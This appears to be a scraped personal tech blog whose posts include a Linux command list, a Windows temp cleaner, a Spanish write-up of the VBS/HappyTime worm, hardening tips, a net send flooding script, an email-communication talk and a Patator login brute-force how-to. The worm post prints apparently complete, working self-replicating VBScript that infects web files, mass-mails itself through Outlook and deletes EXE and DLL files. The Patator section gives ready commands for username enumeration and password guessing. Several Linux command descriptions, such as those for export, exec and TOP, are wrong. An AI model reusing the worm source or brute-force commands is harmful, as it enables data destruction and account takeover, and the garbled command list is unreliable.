Saturday, June 19, 2021

38 Linux Commands and Utilities You CANT Live without

 December 30, 2016 /

This guide contains most essential Linux commands. This Guide is designed specifically for Linux Managers and system administrators.

Below are the 38 Linux Commands and Utilities :-

1.  alias

Using a shorter name instead of those name which are usually associated with such commands it is a simple way to run a command or a series of Unix commands.

2.  apt-get

A tool to automatically update a Debian Machine and install Debian programme/packages.

3.  Aspell

Designed to replace Ispell GNU Aspell is a free and open source spell checker. It can be used as a library or as an Independent spell checker.

4.  bzip2

Compressing and Decompressing is portable, fast at a high rate using bzip2

5.  cat

Displaying contents of a file is commonly used in cat. It is a Unix/Linux command which can read, modify and concatenate text files.

6.  cd

This command changes the current directory in Linux and it can switch between directories conveniently. In  MS-DOS, CD and CHDIR is similar to Cd.

7.  cmp

The basic job of cmp is to compare two files of any type and writes the result to the standard output. Reporting function acts when there is different between the byte and line.

8.  date

Date basically sets a systems date and time. It is more useful while taking output or print information when working in a script file.

9.  declare

Declare modifies properties of Variables and gives them attributes

10.  echo

It allows user to “echo” or repeat string variable to standard output.

11.  enable

It will stop or start classes or printers.

12.  exec

It replaces whatever is typed with the parent process.

13.  export

It converts a file into different format that the one in which it is currently. It can be accessed by any application that uses it format once the file is exported.

14.  find

It searched the directory tree to find particular group of files that meet specifed conditions, including name and type, –size and –exec.

15.  free

Displaying the total amount of free and used physical memory and swap space is done by Free.

16.  gzip

It is used for file compression, compressing web pages on the server. It is the GNU project’s open source program.

17.  ifconfig

It is used to configure the kernel-resident network interfaces. It is needed when debugging or when system tuning is needed.

18.  lessmore

Displaying text files one screen at a time, less command lets an admin scroll through configuration and error log files.

19.  locateslocate

It reads one or more databases and writes file names matching patterns to output.

20.  man

It is a short form of “manual”. Man allows user to display the user manual built into Linux distribution and format.

21.  neat

It helps admins to specify the information needed to set up a network card among other features.

22.  nslookup

It allows user to enter a host name and find corresponding IP address.

23.  ping

It helps user in verifying that a particular IP address exists and can accept requests.

24.  read

It is used to read lines of text from standard input and to assign values of each field in input

25.  rsync

Rsync is similar to rcp, but it has more options, it syncs data from one disk or file to another across a network connection.

26.  screen

It is a terminal multiplexer in which a user can use a single terminal window to run multiple applications or windows.

27.  sdiff

It finds differences between two files by producing a side-by-side listing indicating lines that are dissimilar.

28.  shutdown

It is command that turns off the computer and it can be combined with variables such as –h, for halt after shutdown, or -r, for reboot after shutdown.

29.  sort

It is used to sort lines of text alphabetically or numerically according to fields

30.  sudo

It allows a system admin to give certain users the ability to run some (or all) commands at the root level and logs all commands and arguments.

31.  tar
Creating archives from a number of specified files and extracting files from such an archive is easy with tar program.

32.  TOP

Protocols for network performing distributed information processing in offices and displaying the tasks on the system that takes most memory is the function of TOP.

33.  uname

The function of uname is to display the name of the current operating system and printing information about the system.

34.  uniq

Removing or reporting duplicate lines and comparing adjacent lines in a file is the function of uniq.

35.  vi

A user can control the system by solely using the keyboard instead using a combination of mouse selection and keystrokes with vi.

36.  wc

Counting the number of words, lines and characters in text files and producing a count for multiple files is the function of wc.

37.  whoami

The function of whoami is to print or write the user login name associated with the current ID to the standard output.

38.  xargs

The Xargs builds, reads and executed arguments from standard input, in input the blank lines are ignored

Friday, June 18, 2021


 REM Created by MooreR
REM Clean the basic temp folders.  This is a beta release.

@echo off
IF EXIST "C:\Documents and Settings\" GOTO NT
echo This is not designed for a shitty OS.
echo  MooreR Crap Cleaner 1.0
Echo  %username%, you are cleaning an NT based OS.
echo  Cleaning Up Temp Files/Folders . . .
rmdir /S %TEMP% /Q
echo  Successfuly Cleaned !
echo  Reconstructing Temp Folder . . .
mkdir %TEMP%
echo  Success!
rem echo  Cleaning Temporary Internet Files . . .
rem cd ..
rem cd C:\Documents and Settings\%username%\Local Settings\History\
rem del *.* /F /Q
rem echo  Successfuly Cleaned !
rem echo.    
echo  Cleaning up Recent Files . . .
cd C:\Documents and Settings\%username%\Recent\
del *.* /F /Q
echo  Successfuly Cleaned !


 Nombre: VBS/Help
Alias: VBS/HappyTime.A, VBS/Haptime.A, Happytime, VBS/Haptime@mm, Happytime.A, VBS/HappyTime, VBS_HappyTime.A
Categorías del virus: Virus de Visual Basic Script
¿Reparable?: Si
Fecha de aparición: 29/04/2001
Descripción breve:  

  Se trata de un virus de Visual Basic Script que infecta ficheros con las siguientes extensiones: HTML, HTM; ASP, VBS y HTT. Para su propagación utiliza Outlook Express al estilo de los gusanos pero no como un fichero adjunto al mensaje sino como código script, oculto dentro del diseño de fondo por defecto de los mensajes. En realidad esto es un documento HTML donde se encuentra el script del virus.  

  Como efecto destructivo, si en el momento de su activación la suma del día y el mes es igual a 13, el virus pasa de infectar ficheros con extensiones HTM, HTM, ASP, VBS y HTT a buscar y eliminar ficheros con extenciones DLL y EXE. Todo esto es realizado en todas unidades de disco tanto locales como de red.  
Modo de propagación:  
  Este virus utiliza el correo electrónico para propagarse a otros sistemas. Para hacer esto, el virus oculta su código en el documento HTML que sirve de fondo a los mensajes enviados con Outlook Express. Es en este documento HTML donde se oculta el script del virus.

Síntomas de infección:  

  Si en el momento de su activación el valor resultante de la suma de del día y el mes es igual a 13, el virus dejará de infectar ficheros con extensiones HTML; HTM,  ASP, VBS y HTT y pasará a buscar y eliminar ficheros con extensiones EXE y DLL. El virus realizará todas estas acciones en todas las unidades tanto locales como de red.   

  Por otra parte, en los ficheros generados por el virus, así como en aquellos que infecta, se puede ver el siguiente texto:  

          Rem I am sorry! Happy time  

  Como síntomas de la presencia del virus en el sistema podemos destacar la creación de de los archivos HELP.HTA y HELP.VBS en la primera carpeta que encuentre en la unidad C:. Estos ficheros contienen el código del virus con el formato adecuado a cada tipo de fichero.   

  A continuación se copia en el directorio Windows, en formato HTML con los siguientes nombres: HELP.HTM y UNTITLED.HTM. El primero de estos ficheros es utilzado por el virus para ejecutarse de modo automático siempre que el escritorio esté configurado para que se muestre como una página Web. Para lograr esto, el virus configura este fichero como papel de escritorio a través de la siguiente entrada del registro de Windows:   

          HKEY_CURRENT_USER\Control Panel\Desktop\wallPaper="C:\WINDOWS\Help.htm  
Métodos de infección:  
  Para su propagación a través del correo electrónico, el virus utiliza Outlook Express, configurando el archivo UNTITLED.HTM, que creó en C:\WINDOWS, como diseño de fondo por defecto para los mensajes creado con este programa de correo.  

  Esto lo consigue alterando el contenido de las siguientes claves de registro:  

HKEY_CURRENT_USER\Identities\{USERID}\Software\Microsoft\Outlook Express\5.0\Mail\Message Send HTML="1"
HKEY_CURRENT_USER\Identities\{USERID}\Software\Microsoft\Outlook Express\5.0\Mail\Compose Use Stationery="1"
HKEY_CURRENT_USER\Identities\{USERID}\Software\Microsoft\Outlook Express\5.0\Mail\Stationery Name="C:\WINDOWS\Untitled.htm"

  El valor {USERID} depende del usuario que esté activo en ese momento, tomando el virus este valor de la siguiente clave de registro:  

HKEY_CURRENT_USER\Identities\Default User ID="{USERID}"  

  Después de esto, el virus busca todos los ficheros con extensión .HTT dentro de la carpeta WEB de Windows. Este es el lugar donde se almacenan las vistas en formato HTML de las carpetas del sistema. Por este motivo, si está activa opción que permite ver como una página WEB ciertas carpetas del sistema como pueden ser "Mi PC", "Panel de Control", provocaremos la activación del virus al abrir éstas.  

  Una vez ha realizado todos estos procesos, es decir, en las posteriores ejecuciones, se dedicará a recorrer todas las carpetas de todas las unidades mapeadas, tanto locales como remotas (red), en busca de ficheros con extensión HTML, HTM, ASP o VBS. Cuando encuentre ficheros con estas extensiones, procede a infectarlos. Para no dar error en la ejecución de los archivos infectados, el virus envuelve su código con las etiquetas adecuadas en función del tipo de fichero que infecta. También busca direcciones de correo dentro de los ficheros que infecta, e intenta enviar un mensaje a las direcciones que encuentra.

  Si la suma del día actual más el mes actual es igual a 13, el virus deja de infectar ficheros y procede a borrar los ficheos que encuentre con extensiones .EXE y .DLL. El virus trata de localizar estos ficheros a través de todas las carpetas de todas las unidades locales y de red.  

  Adicionalmente, crea otras 3 claves de registro, en las que mantiene varios valores que actualiza constantemente. Entre ellos se encuentra un contador y el nombre y ruta del fichero que actualmente esta infectando o borrando. Dichas claves son las siguientes:  

Esta clave es el numero de veces que se ha ejecutado.  
Esta clave hace referencia al nombre y ruta del fichero.  

  Finalmente, el virus intentará enviarse automáticamente. Esto dependerá de si el valor del contador es múltiplo de 366, y de si el valor correspondiente a los segundos es par o impar. Al enviarse automáticamente, el virus incluirá el fichero UNTITLED.HTM.


Rem I am sorry! happy time
On Error Resume Next
Sub mload()
On Error Resume Next
mPath = Grf()
Set Os = CreateObject("Scriptlet.TypeLib")
Set Oh = CreateObject("Shell.Application")
If IsHTML Then
mURL = LCase(document.Location)
If mPath = "" Then
Os.Path = "C:\Help.htm"
Os.Doc = Lhtml()
Ihtml = "<span style='position:absolute'><Iframe src='C:\Help.htm' width='0' height='0'></Iframe></span>"
Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
If Iv(mPath, "Help.vbs") Then
setInterval "Rt()", 10000
m = "hta"
If LCase(m) = Right(mURL, Len(m)) Then
id = setTimeout("mclose()", 1)
Os.Path = mPath & "\" & "Help.hta"
Os.Doc = Lhtml()
Iv mPath, "Help.hta"
End If
End If
End If
End If
End Sub
Sub main()
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
Set Od = CreateObject("Scripting.Dictionary")
Od.Add "html", "1100"
Od.Add "vbs", "0100"
Od.Add "htm", "1100"
Od.Add "asp", "0010"
Ks = "HKEY_CURRENT_USER\Software\"
Ds = Grf()
Cs = Gsf()
If IsVbs Then
If Of.FileExists("C:\help.htm") Then
Of.DeleteFile ("C:\help.htm")
End If
Key = CInt(Month(Date) + Day(Date))
If Key = 13 Then
Od.Add "exe", "0001"
Od.Add "dll", "0001"
End If
Cn = Rg(Ks & "Help\Count")
If Cn = "" Then
Cn = 1
End If
Rw Ks & "Help\Count", Cn + 1
f1 = Rg(Ks & "Help\FileName")
f2 = FNext(Of, Od, f1)
fext = GetExt(Of, Od, f2)
Rw Ks & "Help\FileName", f2
If IsDel(fext) Then
f3 = f2
f2 = FNext(Of, Od, f2)
Rw Ks & "Help\FileName", f2
Of.DeleteFile f3
If LCase(WScript.ScriptFullname) <> LCase(f2) Then
Fw Of, f2, fext
End If
End If
If (CInt(Cn) Mod 366) = 0 Then
If (CInt(Second(Time)) Mod 2) = 0 Then
adds = Og
Msend (adds)
End If
End If
wp = Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper")
If Rg(Ks & "Help\wallPaper") <> wp Or wp = "" Then
If wp = "" Then
n1 = ""
n3 = Cs & "\Help.htm"
mP = Of.GetFile(wp).ParentFolder
n1 = Of.GetFileName(wp)
n2 = Of.GetBaseName(wp)
n3 = Cs & "\" & n2 & ".htm"
End If
Set pfc = Of.CreateTextFile(n3, True)
mt = Sa("1100")
pfc.Write "<" & "HTML><" & "body bgcolor='#007f7f' background='" & n1 & "'><" & "/Body><" & "/HTML>" & mt
Rw Ks & "Help\wallPaper", n3
Rw "HKEY_CURRENT_USER\Control Panel\desktop\wallPaper", n3
End If
Set fc = Of.CreateTextFile(Ds & "\Help.vbs", True)
fc.Write Sa("0100")
bf = Cs & "\Untitled.htm"
Set fc2 = Of.CreateTextFile(bf, True)
fc2.Write Lhtml
oeid = Rg("HKEY_CURRENT_USER\Identities\Default User ID")
oe = "HKEY_CURRENT_USER\Identities\" & oeid & "\Software\Microsoft\Outlook Express\5.0\Mail"
MSH = oe & "\Message Send HTML"
CUS = oe & "\Compose Use Stationery"
SN = oe & "\Stationery Name"
Rw MSH, 1
Rw CUS, 1
Rw SN, bf
Web = Cs & "\WEB"
Set gf = Of.GetFolder(Web).Files
Od.Add "htt", "1100"
For Each m In gf
fext = GetExt(Of, Od, m)
If fext <> "" Then
Fw Of, m, fext
End If
End If
End Sub
Sub mclose()
document.Write "<" & "title>I am sorry!</title" & ">"
End Sub
Sub Rt()
Dim mPath
On Error Resume Next
mPath = Grf()
Iv mPath, "Help.vbs"
End Sub
Function Sa(n)
Dim VBSText, m
VBSText = Lvbs()
If Mid(n, 3, 1) = 1 Then
m = "<%" & VBSText & "%>"
End If
If Mid(n, 2, 1) = 1 Then
m = VBSText
End If
If Mid(n, 1, 1) = 1 Then
m = Lscript(m)
End If
Sa = m & vbCrLf
End Function
Sub Fw(Of, S, n)
Dim fc, fc2, m, mmail, mt
On Error Resume Next
Set fc = Of.OpenTextFile(S, 1)
mt = fc.ReadAll
If Not Sc(mt) Then
mmail = Ml(mt)
mt = Sa(n)
Set fc2 = Of.OpenTextFile(S, 8)
fc2.Write mt
Msend (mmail)
End If
End Sub
Function Sc(S)
mN = "Rem I am sorry! happy time"
If InStr(S, mN) > 0 Then
Sc = True
Sc = False
End If
End Function
Function FNext(Of, Od, S)
Dim fpath, fname, fext, T, gf
On Error Resume Next
fname = ""
T = False
If Of.FileExists(S) Then
fpath = Of.GetFile(S).ParentFolder
fname = S
ElseIf Of.FolderExists(S) Then
fpath = S
T = True
fpath = Dnext(Of, "")
End If
Do While True
Set gf = Of.GetFolder(fpath).Files
For Each m In gf
If T Then
If GetExt(Of, Od, m) <> "" Then
FNext = m
Exit Function
End If
ElseIf LCase(m) = LCase(fname) Or fname = "" Then
T = True
End If
fpath = Pnext(Of, fpath)
End Function
Function Pnext(Of, S)
On Error Resume Next
Dim Ppath, Npath, gp, pn, T, m
T = False
If Of.FolderExists(S) Then
Set gp = Of.GetFolder(S).SubFolders
pn = gp.Count
If pn = 0 Then
Ppath = LCase(S)
Npath = LCase(Of.GetParentFolderName(S))
T = True
Npath = LCase(S)
End If
Do While Not Er
For Each pn In Of.GetFolder(Npath).SubFolders
If T Then
If Ppath = LCase(pn) Then
T = False
End If
Pnext = LCase(pn)
Exit Function
End If
T = True
Ppath = LCase(Npath)
Npath = Of.GetParentFolderName(Npath)
If Of.GetFolder(Ppath).IsRootFolder Then
m = Of.GetDriveName(Ppath)
Pnext = Dnext(Of, m)
Exit Function
End If
End If
End Function
Function Dnext(Of, S)
Dim dc, n, d, T, m
On Error Resume Next
T = False
m = ""
Set dc = Of.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
If T Then
Dnext = d
Exit Function
If LCase(S) = LCase(d) Then
T = True
End If
If m = "" Then
m = d
End If
End If
End If
Dnext = m
End Function
Function GetExt(Of, Od, S)
Dim fext
On Error Resume Next
fext = LCase(Of.GetExtensionName(S))
GetExt = Od.Item(fext)
End Function
Sub Rw(k, v)
Dim R
On Error Resume Next
Set R = CreateObject("WScript.Shell")
R.RegWrite k, v
End Sub
Function Rg(v)
Dim R
On Error Resume Next
Set R = CreateObject("WScript.Shell")
Rg = R.RegRead(v)
End Function
Function IsVbs()
Dim ErrTest
On Error Resume Next
ErrTest = WScript.ScriptFullname
If Err Then
IsVbs = False
IsVbs = True
End If
End Function
Function IsHTML()
Dim ErrTest
On Error Resume Next
ErrTest = document.Location
If Er Then
IsHTML = False
IsHTML = True
End If
End Function
Function IsMail(S)
Dim m1, m2
IsMail = False
If InStr(S, vbCrLf) = 0 Then
m1 = InStr(S, "@")
m2 = InStr(S, ".")
If m1 <> 0 And m1 < m2 Then
IsMail = True
End If
End If
End Function
Function Lvbs()
Dim f, m, ws, Of
On Error Resume Next
If IsVbs Then
Set Of = CreateObject("Scripting.FileSystemObject")
Set f = Of.OpenTextFile(WScript.ScriptFullname, 1)
Lvbs = f.ReadAll
For Each ws In document.scripts
If LCase(ws.Language) = "vbscript" Then
If Sc(ws.Text) Then
Lvbs = ws.Text
Exit Function
End If
End If
End If
End Function
Function Iv(mPath, mName)
Dim Shell
On Error Resume Next
Set Shell = CreateObject("Shell.Application")
If Er Then
Iv = False
Iv = True
End If
End Function
Function Grf()
Dim Shell, mPath
On Error Resume Next
Set Shell = CreateObject("Shell.Application")
mPath = "C:\"
For Each mShell In Shell.NameSpace(mPath).Items
If mShell.IsFolder Then
Grf = mShell.Path
Exit Function
End If
If Er Then
Grf = ""
End If
End Function
Function Gsf()
Dim Of, m
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
m = Of.GetSpecialFolder(0)
If Er Then
Gsf = "C:\"
Gsf = m
End If
End Function
Function Lhtml()
Lhtml = "<" & "HTML" & "><HEAD" & ">" & vbCrLf & _
"<" & "Title> Help </Title" & "><" & "/HEAD>" & vbCrLf & _
"<" & "Body> " & Lscript(Lvbs()) & vbCrLf & _
"<" & "/Body></HTML" & ">"
End Function
Function Lscript(S)
Lscript = "<" & "script language='VBScript'>" & vbCrLf & _
S & "<" & "/script" & ">"
End Function
Function Sl(S1, S2, n)
Dim l1, l2, l3, i
l1 = Len(S1)
l2 = Len(S2)
i = InStr(S1, S2)
If i > 0 Then
l3 = i + l2 - 1
If n = 0 Then
Sl = Left(S1, i - 1)
ElseIf n = 1 Then
Sl = Right(S1, l1 - l3)
End If
Sl = ""
End If
End Function
Function Ml(S)
Dim S1, S3, S2, T, adds, m
S1 = S
S3 = """"
adds = ""
S2 = S3 & "mailto" & ":"
T = True
Do While T
S1 = Sl(S1, S2, 1)
If S1 = "" Then
T = False
m = Sl(S1, S3, 0)
If IsMail(m) Then
adds = adds & m & vbCrLf
End If
End If
Ml = Split(adds, vbCrLf)
End Function
Function Og()
Dim i, n, m(), Om, Oo
Set Oo = CreateObject("Outlook.Application")
Set Om = Oo.GetNamespace("MAPI").GetDefaultFolder(10).Items
n = Om.Count
ReDim m(n)
For i = 1 To n
m(i - 1) = Om.Item(i).Email1Address
Og = m
End Function
Sub Tsend()
Dim Od, MS, MM, a, m
Set Od = CreateObject("Scripting.Dictionary")
MConnect MS, MM
MM.FetchSorted = True
For i = 0 To MM.MsgCount - 1
MM.MsgIndex = i
a = MM.MsgOrigAddress
If Od.Item(a) = "" Then
Od.Item(a) = MM.MsgSubject
End If
For Each m In Od.Keys
MM.MsgSubject = "Fw: " & Od.Item(m)
MM.RecipAddress = m
MM.AttachmentPathName = Gsf & "\Untitled.htm"
End Sub
Function MConnect(MS, MM)
Dim U
On Error Resume Next
Set MS = CreateObject("MSMAPI.MAPISession")
Set MM = CreateObject("MSMAPI.MAPIMessages")
U = Rg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\DefaultProfile")
MS.UserName = U
MS.DownLoadMail = False
MS.NewSession = False
MS.LogonUI = True
MM.SessionID = MS.SessionID
End Function
Sub Msend(Address)
Dim MS, MM, i, a
MConnect MS, MM
i = 0
For Each a In Address
If IsMail(a) Then
MM.RecipIndex = i
MM.RecipAddress = a
i = i + 1
End If
MM.MsgSubject = " Help "
MM.AttachmentPathName = Gsf & "\Untitled.htm"
End Sub
Function Er()
If Err.Number = 0 Then
Er = False
Er = True
End If
End Function
Function IsDel(S)
If Mid(S, 4, 1) = 1 Then
IsDel = True
IsDel = False
End If
End Function

------------------------------------------- FIN

Thursday, June 17, 2021

Disable dcom


Disable DCOM completey so you are not vulnerable to many exploits, such as RPC and BlasterWorm.


Disable port 445


Disable port 445 so people can not do enumeration against your PC even if you have netbios disabled.


Net Send script

'VBS Net Send
'created by MooreR

Set WshShell = Wscript.CreateObject("Wscript.Shell")

function SendMessage(Machine, Message, Times)

for i = 1 to Times "net send" & " " & machine & " " & message,0

end function

msgbox "Thank you for using VBS Net Send" & vbnewline & vbnewline & "Application: " & wscript.application & " " & WScript.Version & vbnewline & _
"Wscript Path: " & wscript.path & vbnewline & "Filename: " & WScript.ScriptName & vbnewline & _
"Location: " & WScript.ScriptFullName & vbnewline & vbnewline & "By MooreR", vbokonly + vbquestion

call CmdSend

Sub CmdSend()

machine = inputbox ("Enter IP Address if you are sending over the internet." & vbnewline & vbnewline & "Machine Name if you are on a LAN." & vbnewline & vbnewline & _
"TIP: Use * to send a message to the entire network.", "VBS Net Send")

if machine = "" then
msgbox "Enter a valid user!"
end if

message= inputbox ("Enter Your Message")

if message = "" then
msgbox "Enter a valid Message!"
end if

askem = msgbox ("Would you like to flood the user?", vbyesno)

if askem = vbyes then

times = inputbox("How Many Would You Like To Send?")

if times = "" then
end if


Times = "1"

end if

sendmessage machine, message, times

End Sub

Email Miscommunication by Dr. Rick Brinkman

Devil: Can you believe she said that to you? She's got some nerve. Tell her what you think. Let her have it.
Angel: Hold on there. Remember you're hallucinating freely as to how she sounds when she says that. You're projecting the tone on the email.
Devil: Oh, please. She's obviously sarcastic when she says, "I really don't want to discuss this in email anymore."
Angel: I'm not sure how her saying, "I really can't discuss this in email anymore. Let's talk." is sarcastic.
Devil: I didn't see that line. But it doesn't matter. She's obviously sarcastic. Go ahead -- tell her.
Angel: You have to ask yourself, "Is email the best way to proceed?" Perhaps you should call her.
Devil: Just mind your own business fairy boy. Go ahead. Tell her what you think. Flame her."
Angel: If you're gonna write, then remember time is your friend.
Devil: Time? You've got a ton of other important things to do. Just email quick and move on.
Angel: And if you do that how much time will you waste concerned about her response, waiting for her next email in response to you? Take your time. Consider what you want and what's the best format to get it.
Devil: Oh, this is disgusting. I'm not going to waste my time with you anymore. I'm going to the political forums where people do it right. They fire first, think later.
Anyone ever have a misunderstanding on email? Yeah, what's that all about? You know, I've been teaching communications since 1980 and I'm amazed at how much more conflict there is in writing since we entered the digital age. In the digital age, part of the seduction is that it's quick, not to mention we have a big volume to deal with so we get in a real get-it-done mode with email. So we get something, we read quickly, we hallucinate freely, we respond quickly. Misunderstanding. Just because an interaction began in the email format, does not mean it should continue in the email format. As a conscious communicator you want to recognize the strengths and the weaknesses of each modality and use them wisely. So I suggest you set up some rules for yourself. Here's Rick's rules on when it's time to bail on email.
Number one, if you suspect emotional content. Conscious communicators repeat after me on three. I am hallucinating freely. One, two, three; I am hallucinating freely. You don't know how people sound. You are making it up. Now you may be right, you may be half right but it's still your fantasy. It's a projection. If you're hallucinating that they're having a strong emotional response, if you are having a strong emotional response to whatever you're hallucinating about, treat that as a signal, better to bail on email. If you have to ask more than X questions, and I would say X equals one, yes or no. If it's any more complicated than yes or no, if it's any more than one, it really should be done interactively. Clarification needs to be done interactively. Because you check and you double check and you make sure you're talking about the same thing with your words. If you leave it in writing, you could think you're in the same page. Hey, you're not even in the same book. And last but not least, you want to bail on email if you write something and you just have a little bit of a concern about how they might take it, better to bail on email.
Now you know it's time to stay in writing if you need to complete a communication and you might not do it in person. Maybe you're intimidated by this person so you won't say what you feel or maybe they're very get it done or they're a tank and they're likely to talk over you and run over you. Then you got to write it all down. If you need to document information, that's what writing is for. All right. "Here's a summary of what we discussed and what we agreed upon in our phone call, would you agree this reflects it? Here are the facts. Here are the figures. Here are the dates." That's what writing is for. And last but not least, you know it's time to write if you need to communicate to a number of people who are all over the place at the same time.
So let's go back to this moment in time. We receive an email. We remind ourselves, no matter how real it seems, we are hallucinating freely. We ask ourselves is email the best way to proceed and if the answer is no, then you respond by setting up an interactive moment. So you write back, "I get that this is very important to you after all you've written me and I think the best thing for us to do is talk about it. What's a good time for you?" If they respond with a second round, that does not obligate you to engage. Hold the line, refuse to go there. "Listen, I get this is important. You've written me twice. I want you to know I think it's important too. We need to talk about it. Here's some times. Pick whatever one is good for you." If they've CCed everyone and their sister, well, then you probably have to do that to the whole CC list. But always make sure that you create a summary. Whenever you talk and you work it out, create a summary and complete that loop for the list.
So what if you are going to respond in writing. What if it is appropriate to respond? Well, remember that time is your friend. Take time back on your side. Do not respond to that email immediately. Now you may have to do a brain dump where you get all your thoughts out of your head so they're not distracting you, so you can go onto something else for awhile. If you do that, caution, do not do it in your email client. Open a separate text document and dump all your thoughts. I cannot begin to tell you how many times in seminars I've heard horror stories of someone who dumped all their thoughts, they vented a little and said what they really would like to say but of course they would never say and then when they meant to click save, they clicked send. Beware, stay out of the email client. Then you're going to reread their email at another point in space and time. Tell me something. Have you ever reread an email the next day? Have you noticed that there are sentences in there that clearly were not in there the day before? You know why that is? Why it is is because we as human beings can only pay attention to seven, give or take two things, at any one time consciously. So we're reading something. That triggers us off into thought and we keep reading unconsciously. So beware, you definitely want to reread emails at other points in time before you give a final response and a little trick to make sure you're not missing things, I would suggest before you send your email, reread it out loud and listen to your tone. Is the meaning of your email tone-dependent? See, this is especially true when we're joking because a lot of times what makes something funny is the contrast of how you sound and what gets said but you cannot depend on people hearing it in the tone in which you mean it. So when you read out loud, listen for tone dependency and if you hear that what you're saying and meaning is really dependent on tone, you need to rewrite.

Patator - how to



patator http_fuzz -f

Building the command, based on site parameters and options:

patator http_fuzz url= method=POST body='username=FILE0&password=test' 0=/root/Desktop/usernames.txt follow=1 accept_cookie=1 -x ignore:fgrep='Invalid Username'


For when the site doesn’t display whether is the wrong user or password:

Check cookies, in Inspect Element, go to the Cookie tab, notice the PHPSESSID and result below it under User.

patator http_fuzz url= method=POST body='username=FILE0&password=test' 0=/root/Desktop/usernames.txt follow=1 accept_cookie=1 -x ignore:fgrep=’wrong_user’


Since we now have the username, we can now find the password, with a brute-force method.

We try some credentials and we get “Invalid Credentials”.

The parameters are ‘usr’ and ‘pwd’ inside of the Inspect Element.

patator http_fuzz url= method=POST body='usr=admin&pwd=FILE0' 0=/root/Desktop/password.txt -x ignore:fgrep=’Invalid credentials’